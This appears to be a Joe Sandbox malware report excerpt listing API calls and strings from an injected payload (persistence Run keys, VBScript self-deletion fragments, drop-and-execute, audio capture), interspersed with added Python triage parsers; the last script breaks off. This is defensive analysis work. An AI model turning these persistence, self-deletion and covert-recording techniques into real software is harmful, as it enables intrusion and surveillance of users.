                                                                                                                                                                          • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,xtv,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                          • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$h]v$hev$open$tMG$wend$while fso.FileExists("
                                                                                                                                                                          • API String ID: 1861856835-2938071300
                                                                                                                                                                          • Opcode ID: 01e75365670913a74037fc770f87f6e0f62e7cfdb741a955a470a615d800a725
                                                                                                                                                                          • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                                                                                                                                                          • Opcode Fuzzy Hash: 01e75365670913a74037fc770f87f6e0f62e7cfdb741a955a470a615d800a725
                                                                                                                                                                          • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,xtv,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,7570D4DF,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$h]v$hev$open$pth_unenc$tMG$wend$while fso.FileExists("$xpF$xtv
                                                                                                                                                                          • API String ID: 3797177996-2267641185
                                                                                                                                                                          • Opcode ID: 56c26de81a3ad07f9f61490d051f58a648356af45db4a42d1502b8aa40545037
                                                                                                                                                                          • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                                                                                                                                                          • Opcode Fuzzy Hash: 56c26de81a3ad07f9f61490d051f58a648356af45db4a42d1502b8aa40545037
                                                                                                                                                                          • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,h}v,00000003), ref: 004124CF
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                          • String ID: (TG$.exe$WDH$exepath$h]v$h}v$open$temp_
                                                                                                                                                                          • API String ID: 2649220323-2127812022
                                                                                                                                                                          • Opcode ID: 8441b20f7618228a39f573a204bdd359fc491a9b2039a908e3d83ac6aa0b59e3
                                                                                                                                                                          • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8441b20f7618228a39f573a204bdd359fc491a9b2039a908e3d83ac6aa0b59e3
                                                                                                                                                                          • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
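The four function listings above (the GDI screen-capture routine, the two near-identical uninstall routines whose referenced strings spell out a VBScript loop that deletes the executable and then itself, and the mutex/temp-file update routine) are the API-and-string evidence an analyst reads to assign capabilities to a dumped function. The following is an added example, not part of the Joe Sandbox report nor code from the analysed sample: a small Python parser for this listing format that maps API sets and referenced strings to capability labels. The rule names and thresholds are my own; the sample lines are copied (abridged) from the listings above.

```python
import re
from dataclasses import dataclass, field

# One API line of a Joe Sandbox "APIs" listing, in the three shapes seen on the page:
#   "• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8"
#   "• Part of subcall function 0041288B: TerminateProcess.KERNEL32(...), ref: 0041289B"
#   "• GetIconInfo.USER32 ref: 00418FF8"   (no argument list)
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function\s+(?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<dll>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# The "String ID" line lists the function's referenced strings joined by '$'.
STRING_ID_LINE = re.compile(r"^•\s*String ID:\s*(?P<body>.*)$")


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list
    ref: str            # call-site address
    callee: str = None  # subcall function address when the call is reached indirectly


@dataclass
class FunctionListing:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)


def parse_listing(text):
    """Parse one function's 'APIs' block together with its 'String ID' line."""
    listing = FunctionListing()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            listing.calls.append(ApiCall(m.group("api"), m.group("dll"), args,
                                         m.group("ref"), m.group("callee")))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            listing.strings.extend(s for s in m.group("body").split("$") if s)
    return listing


# Capability rules (my own labels, not Joe Sandbox's). A rule fires when every API in
# "all" is present, one of "any" is present, and every "strings" fragment is referenced.
RULES = {
    "screen_capture":        {"all": {"CreateCompatibleDC", "GetDIBits"}, "any": {"BitBlt", "StretchBlt"}},
    "cursor_overlay":        {"all": {"GetCursorInfo", "DrawIcon"}},
    "single_instance_mutex": {"all": {"CreateMutexA", "ExitProcess"}},
    "wait_on_other_process": {"all": {"OpenProcess", "WaitForSingleObject"}},
    "drop_and_execute_temp": {"all": {"GetTempFileNameW", "ShellExecuteW"}},
    "hook_teardown":         {"all": {"UnhookWindowsHookEx"}},
    "run_key_reference":     {"strings": ["CurrentVersion\\Run\\"]},
    "self_delete_via_vbs":   {"all": {"ShellExecuteW", "ExitProcess"},
                              "strings": ["Scripting.FileSystemObject",
                                          "fso.DeleteFile(Wscript.ScriptFullName)"]},
}


def capabilities(listing):
    """Return the sorted capability labels whose rule the listing satisfies."""
    present = {c.api for c in listing.calls}
    blob = "\n".join(listing.strings)
    hits = []
    for name, rule in RULES.items():
        if not rule.get("all", set()) <= present:
            continue
        if rule.get("any") and not (rule["any"] & present):
            continue
        if all(frag in blob for frag in rule.get("strings", [])):
            hits.append(name)
    return sorted(hits)


# Sample input: lines copied (abridged) from the listings above, embedded so this runs offline.
SAMPLE_SCREENSHOT = r'''
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
• GetCursorInfo.USER32(?), ref: 00418FE2
• GetIconInfo.USER32 ref: 00418FF8
• DrawIcon.USER32(00000000,?,?,?), ref: 00419041
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
• String ID: DISPLAY
'''
SAMPLE_UNINSTALL = r'''
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
• ExitProcess.KERNEL32 ref: 0040D454
• String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$wend$while fso.FileExists("
'''
SAMPLE_UPDATE = r'''
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,h}v,00000003), ref: 004124CF
• ExitProcess.KERNEL32(00000000), ref: 004124DB
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
• String ID: (TG$.exe$WDH$exepath$h]v$h}v$open$temp_
'''
```

Calling capabilities(parse_listing(SAMPLE_UNINSTALL)) yields hook_teardown, run_key_reference and self_delete_via_vbs; the screenshot sample yields cursor_overlay and screen_capture; the update sample yields drop_and_execute_temp, single_instance_mutex and wait_on_other_process. Rules keyed on API co-occurrence within one function are deliberately loose (the same GDI sequence appears in benign screen-recording code), so treat the labels as triage hints to be confirmed against the Sigma and Yara detections at the top of the report rather than as verdicts.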
                                                                                                                                                                          APIs
                                                                                                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                          • API String ID: 738084811-1354618412
                                                                                                                                                                          • Opcode ID: 09cee7633b9e23939470f9bc6a52289f86f1ce1391760338b6670702ea153f43
                                                                                                                                                                          • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                                                                                                                                                          • Opcode Fuzzy Hash: 09cee7633b9e23939470f9bc6a52289f86f1ce1391760338b6670702ea153f43
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Write$Create
                                                                                                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                          • API String ID: 1602526932-4212202414
                                                                                                                                                                          • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                                                                                          • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                                                                                                                                                          • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                                                                                          • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
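The fourteen WriteFile calls in the function above emit, in order, "RIFF", a size, "WAVE", "fmt ", the fmt chunk size, a 2-byte format tag, a 2-byte channel count, a 4-byte sample rate, a 4-byte byte rate, a 2-byte block align, a 2-byte bits-per-sample, "data" and a 4-byte data size: the canonical 44-byte PCM WAV header, which is what a recorded microphone capture is written to on disk. The following is an added example, not code from the report or from the sample; it rebuilds that header from parameters and parses and sanity-checks a recovered file so an analyst can read off a capture's duration and see whether the file was cut short (the sample capture is constructed silence, not audio from the sandbox run, and the field names are this example's own).

```python
"""RIFF/WAVE header writer and parser matching the WriteFile sequence in the
listing above. Added example; not part of the Joe Sandbox report or of the
analysed sample. The constructed SAMPLE_CAPTURE is one second of silence."""
import struct
from typing import Optional

HEADER_LEN = 44
# fmt chunk size, format tag, channels, sample rate, byte rate, block align, bits
FMT_STRUCT = "<IHHIIHH"


def build_wav_header(data_len: int, channels: int = 1, sample_rate: int = 8000,
                     bits_per_sample: int = 16, fmt_tag: int = 1) -> bytes:
    """Emit the 44 header bytes in the same order as the WriteFile calls."""
    block_align = channels * bits_per_sample // 8
    byte_rate = sample_rate * block_align
    return (b"RIFF" + struct.pack("<I", 36 + data_len) + b"WAVE"
            + b"fmt " + struct.pack(FMT_STRUCT, 16, fmt_tag, channels,
                                    sample_rate, byte_rate, block_align,
                                    bits_per_sample)
            + b"data" + struct.pack("<I", data_len))


def parse_wav_header(buf: bytes) -> Optional[dict]:
    """Return the header fields, or None when the four tags are not in place."""
    if len(buf) < HEADER_LEN:
        return None
    tags = (buf[0:4], buf[8:12], buf[12:16], buf[36:40])
    if tags != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        return None
    riff_size = struct.unpack_from("<I", buf, 4)[0]
    (fmt_size, fmt_tag, channels, sample_rate,
     byte_rate, block_align, bits) = struct.unpack_from(FMT_STRUCT, buf, 16)
    data_len = struct.unpack_from("<I", buf, 40)[0]
    return {"riff_size": riff_size, "fmt_size": fmt_size, "fmt_tag": fmt_tag,
            "channels": channels, "sample_rate": sample_rate,
            "byte_rate": byte_rate, "block_align": block_align,
            "bits_per_sample": bits, "data_len": data_len}


def triage_capture(buf: bytes) -> Optional[dict]:
    """Duration and consistency checks for a recovered capture file."""
    hdr = parse_wav_header(buf)
    if hdr is None:
        return None
    expected_rate = hdr["sample_rate"] * hdr["block_align"]
    present = len(buf) - HEADER_LEN          # payload bytes actually on disk
    return {
        "duration_s": hdr["data_len"] / hdr["byte_rate"] if hdr["byte_rate"] else None,
        "sizes_consistent": hdr["riff_size"] == 36 + hdr["data_len"],
        "rate_consistent": hdr["byte_rate"] == expected_rate,
        "truncated": present < hdr["data_len"],   # file ended before data size
        "pcm": hdr["fmt_tag"] == 1,
    }


# Constructed sample: one second of 8 kHz, 16-bit, mono silence.
SAMPLE_CAPTURE = build_wav_header(16000) + bytes(16000)
```

A capture whose RIFF size or data size disagrees with the bytes on disk was still open when the process was killed or the dump was taken; the header written up front still gives the rate and channel layout needed to play back the partial payload.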
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004076B0,xtv,00407709), ref: 004072BF
• GetProcAddress.KERNEL32(00000000), ref: 004072C8
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
• GetProcAddress.KERNEL32(00000000), ref: 004072F4
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
• GetProcAddress.KERNEL32(00000000), ref: 0040731C
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-165202446
• Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
• Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
• Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
• Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
APIs
• _wcslen.LIBCMT ref: 0040CE42
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,h}v,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
• CopyFileW.KERNEL32 ref: 0040CF0B
• _wcslen.LIBCMT ref: 0040CF21
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32 ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• _wcslen.LIBCMT ref: 0040D001
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
• CloseHandle.KERNEL32 ref: 0040D068
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$hev$h}v$open$xtv
• API String ID: 1579085052-1863362863
• Opcode ID: 50338bd9006b4bbe80098d29614b74571d66c3dbc6049c3a7372665ca615c5fb
• Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
• Opcode Fuzzy Hash: 50338bd9006b4bbe80098d29614b74571d66c3dbc6049c3a7372665ca615c5fb
• Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
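Read together, the last two functions show the install path of the injected payload: ntdll internals (NtAllocateVirtualMemory, NtFreeVirtualMemory, RtlAcquirePebLock, RtlReleasePebLock, LdrEnumerateLoadedModules) are resolved by name, then a directory is created, the binary is copied into it, both the directory and the copy get attribute mask 00000007 (FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, so a default Explorer view does not list them), the copy is started via ShellExecuteW "open" and the original exits. The following is an added example, not part of the report: a small parser for the report's API-call lines and a handful of rules that tag these behaviours, run over lines copied from the listings above. The rule names, the attribute-bit table and the `Call` record are this example's own assumptions, not anything Joe Sandbox emits.

```python
"""Tag behaviours in Joe Sandbox per-function API-call listings.
Added example, not part of the report. SAMPLE_* lines are copied from the
listings on this page; rule names and thresholds are this example's own."""
import re
from dataclasses import dataclass

# Matches "• Api.MODULE(args), ref: ADDR" and "• Api.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function XXXX:".
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# FILE_ATTRIBUTE_* bits from winnt.h (subset used for triage).
FILE_ATTRS = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM",
              0x10: "DIRECTORY", 0x20: "ARCHIVE", 0x80: "NORMAL"}
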